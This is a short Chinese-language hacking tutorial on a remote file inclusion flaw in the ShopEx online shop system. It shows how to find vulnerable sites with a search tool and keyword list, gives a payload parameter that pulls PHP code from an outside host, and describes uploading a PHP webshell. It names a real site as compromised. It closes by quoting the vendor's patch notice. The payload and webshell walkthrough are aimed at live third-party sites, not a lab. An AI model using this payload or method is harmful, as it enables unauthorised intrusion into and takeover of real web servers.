个实战

ShopEx 国内市场占有率最高的网店系统.ShopEx是网络购物软件与技术服务

全面提供商，ShopEx做为国内购物软件的开拓者和实践者，提供了从购物软件

（包括网上商店、网上商城、网上商店多店系统）到相关配套服务（网店推广、

模板设计、流量监测、商业智能分析、网上支付、网店互联、购物系统定制开发等）

以及深层次的电子商务技术服务。

漏洞原理：

出现在 /shop/npsout_reply.php 页面

找这个漏洞页面 可以使用挖掘鸡V1.1版

关键字 就用 ： 产品目录 联系我们 关于我们 常见问题 安全交易 购买流程 如何付款

在存在漏洞的网站后面加上：

?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?

下面看我怎么入侵  现在开始  用挖掘鸡   这个已经打上补丁了

在看下一个

官方已经给出漏洞补丁了 可到现在了还有好多站存在这个漏洞

出现了远程执行php命令的画面. 现在我们来上传一个php马 
 
ok 传上去了 现在来看看  好了 http://www.hemudu.cn/shop/php.php

成功拿下 一个 php站  

http://www.shopex.cn/bbs/thread-27523-1-1.html
请速下载V4.7.1 KS47103补丁修正远程代码执行漏洞

ShopEx发布单店版V4.7.1 KS47103修正了一个远程代码执行漏洞。

收到漏洞报告后，ShopEx技术人员快速反应，于30分钟内即完成了补丁的制作测试与发布工作